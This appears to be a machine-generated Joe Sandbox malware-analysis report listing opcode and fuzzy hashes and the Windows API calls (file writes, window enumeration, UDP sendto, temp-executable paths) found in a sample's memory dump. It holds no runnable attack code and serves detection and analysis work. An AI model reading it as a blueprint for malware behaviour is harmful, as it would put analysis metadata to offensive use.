                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$lstrcat$lstrlen$Sleep$lstrcmpilstrcpyn
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4241744780-0
                                                                                                                                                                                                                                                      • Opcode ID: a5797a3337ac284f49606b989114822fa8f6a7677816d38e25a2feba24009512
                                                                                                                                                                                                                                                      • Instruction ID: e1c63eb699c4a579d3e53cbe12f8c53483fa5a3500a6c19c00d829c2c369af7d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5797a3337ac284f49606b989114822fa8f6a7677816d38e25a2feba24009512
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331E371B003289FEF20CF64D805BEB77E4AF04314F50096EE95696293DB789989CB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: GetTickCount.KERNEL32 ref: 0041F92B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F966
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F985
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F990
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F99B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F9A2
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F9B2
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00420827
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000000,?,00000078,?,?,00000000), ref: 0042083D
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 0042087F
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042089F
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420325
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: Sleep.KERNEL32(0000012C), ref: 00420331
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420366
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 0042038A
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420393
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$lstrcat$lstrlen$Sleep$lstrcmpilstrcpyn
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4241744780-0
                                                                                                                                                                                                                                                      • Opcode ID: 9392b36242cc7ed13ec57d78c28b336a9ef2289a1b2e8936bea960e985ed45cd
                                                                                                                                                                                                                                                      • Instruction ID: 42656bc9f5e024d0354263a5112524b3942502546d307857efd8012ea829e0b8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9392b36242cc7ed13ec57d78c28b336a9ef2289a1b2e8936bea960e985ed45cd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB31E131B003289FDF20DF64DC45BEB77E8BF04304F4009AEE916E6252DBB899498B94
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00424F32: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424F4C
                                                                                                                                                                                                                                                        • Part of subcall function 00424F32: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00424F5D
                                                                                                                                                                                                                                                        • Part of subcall function 00424F32: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00424FA3
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,00000000,?,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 00429232
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000009,776AC310,00000000,00000000,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 0042924F
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(76AF0F00,00000001,776AC310,00000000,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004292C5
                                                                                                                                                                                                                                                      • CompareStringW.KERNEL32(?,00422306,?,00000000,?,00000000,?,00000000,?,0042413A,00000000,76AF0F00,00000000,776AC310,C:\Windows\system32\), ref: 004292DB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$QueryVirtual$CompareInfoStringSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1997773198-0
                                                                                                                                                                                                                                                      • Opcode ID: fb35f81421f692068891776308fa5d31242e05a5f257596bc3c7b8f33c9911f2
                                                                                                                                                                                                                                                      • Instruction ID: ae47bed5f32cbe4aa223ba5e2d21f9e998b1d44a72276bfa51ed39dd79f559bf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb35f81421f692068891776308fa5d31242e05a5f257596bc3c7b8f33c9911f2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3331AF32A00229EBCF21DF95EC45BDEBF76EF44724FA1011AF814A61A0CB788D51CB58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00406810,40000000,00000002,00000000,00000004,00000080,00000000,76AE8A60,?,00406810,?), ref: 004066A1
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004066AA
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(000000FF,?,00001000,00406810,00000000,75D36610,00000000,?,00406810), ref: 004066F4
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF,?,00406810), ref: 00406706
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandle$CountSizeTickWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1977331138-0
                                                                                                                                                                                                                                                      • Opcode ID: 75411ad5c477393b6fdeb7caef021b528b0a5ab15cfd8a9bf23aa59ee7e7a4d7
                                                                                                                                                                                                                                                      • Instruction ID: 4f04a93556094e34b3a37cb498cd4860a69bac382634e6e20e0837a594e2ce7d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75411ad5c477393b6fdeb7caef021b528b0a5ab15cfd8a9bf23aa59ee7e7a4d7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17113B32E00214ABDB216BA8DC42BDD3A29EF40769F010177FD05B71E1CA759E918698
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041725B
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00417266
                                                                                                                                                                                                                                                      • GetWindowInfo.USER32(?,?), ref: 00417271
                                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 0041729C
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: GetWindow.USER32(?,00000000), ref: 00417139
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: GetWindowPlacement.USER32(00000000,?,?,?,?), ref: 00417156
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: GetClassNameA.USER32(00000000,00000000,00000080), ref: 00417180
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: IsWindowVisible.USER32(00000000), ref: 004171C7
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: IsWindowEnabled.USER32(00000000), ref: 004171D2
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: GetWindow.USER32(00000000,00000005), ref: 004171F8
                                                                                                                                                                                                                                                        • Part of subcall function 00417125: GetWindow.USER32(00000000,00000002), ref: 00417226
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rect$ClassClientEnabledInfoNamePlacementVisible
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 958396790-0
                                                                                                                                                                                                                                                      • Opcode ID: 451f102180915608758762e81bcc6ea204a602677e2a5c43edadebfc5579c894
                                                                                                                                                                                                                                                      • Instruction ID: b977da9bbf90926a89ef85ef9d4faa28d65c36069d63d0f58ffc69ee64d48ea3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 451f102180915608758762e81bcc6ea204a602677e2a5c43edadebfc5579c894
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D110A72A0051AAFCF04DFA8DD45AEF7BB9FF45304F104069F901A7280D771AA168BA5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4250438611-0
                                                                                                                                                                                                                                                      • Opcode ID: 927089b9a521020d12e607415fbab0d40aa0b1844df1ff430aeeb4e75aa2d9aa
                                                                                                                                                                                                                                                      • Instruction ID: c9d6b92abd626ca5db185230e959bef37719a4ae52968149ec7b4f218e17ecc5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 927089b9a521020d12e607415fbab0d40aa0b1844df1ff430aeeb4e75aa2d9aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 590161708047809AEF30AB30D6444ABBB909F113507498D5FD4E6E26D1D79DACE89B5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00415D21
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,00000000), ref: 00415D58
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 00415D67
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00415D6E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1421093161-0
                                                                                                                                                                                                                                                      • Opcode ID: 751aca115ca30a0691fde6439a8cb51a404cb0d25d1dc1366fcd9267d9eefbed
                                                                                                                                                                                                                                                      • Instruction ID: c9399c30415d5887cf24083e5581c53b54ef4251420ccb471ea54a3b1316dc9a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 751aca115ca30a0691fde6439a8cb51a404cb0d25d1dc1366fcd9267d9eefbed
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9F0C872744108BBD7209760EC4EFFB367CA744B15F900571FA01E50C0D7745A559B29
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PostMessageA.USER32(004153D7,00000200,004153D7,?), ref: 004172FA
                                                                                                                                                                                                                                                      • PostMessageA.USER32(004153D7,00000021,004153D7,02040001), ref: 00417305
                                                                                                                                                                                                                                                      • PostMessageA.USER32(004153D7,00000201,00000001,?), ref: 00417310
                                                                                                                                                                                                                                                      • PostMessageA.USER32(004153D7,00000202,00000001,?), ref: 0041731B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c15f197f06ad4af64c7e4a50c373954960f06710e255eec9a3b5d27e1103e77
                                                                                                                                                                                                                                                      • Instruction ID: 2737aa16c3ff472dc59428932faf493f836c28255a8283cd38114ac1b539a4e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c15f197f06ad4af64c7e4a50c373954960f06710e255eec9a3b5d27e1103e77
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3F012722413287AEA205A6A9CC9ECB7B1DEB85764F024511FA187718285B5A8148AB0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00459C70,?,004169E4,?,?,0000076C,?), ref: 0041612D
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?,?,004169E4,?,?,0000076C,?), ref: 0041613F
                                                                                                                                                                                                                                                      • htons.WS2_32 ref: 0041615E
                                                                                                                                                                                                                                                      • sendto.WS2_32(?,?,00000000,00000000,00000002,00000010), ref: 00416181
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: htonslstrcpylstrlensendto
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4028827002-0
                                                                                                                                                                                                                                                      • Opcode ID: ada5a819c4780d407ae664290336f1a96f003a884f285d8cd3a884cb3c6307ef
                                                                                                                                                                                                                                                      • Instruction ID: 24cd2ecbbff7c42d4baa1b946ab2aa8548660ea003772a9b4aab4a1b122aa4a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ada5a819c4780d407ae664290336f1a96f003a884f285d8cd3a884cb3c6307ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83F0317690021DABCF10EF90EC09BDE77BCFF04300F408465FD15A21A1DB7496618B66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderFromListLocationMallocPathSpeciallstrcat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 184925564-0
                                                                                                                                                                                                                                                      • Opcode ID: c5650b9585e189a1aad39bfab654fba963a07972d6129a42c432e7bc8104cf66
                                                                                                                                                                                                                                                      • Instruction ID: 4893c9fcd2a20e39af297159af48713977b3e8e57404a87c3b1fccec64a73e85
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5650b9585e189a1aad39bfab654fba963a07972d6129a42c432e7bc8104cf66
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0F0E275600219FFCB109F94DC08A9A7BA8EF09315F1080A4FD05D7250D675AA12CBA6
                                                                                                                                                                                                                                                      APIs
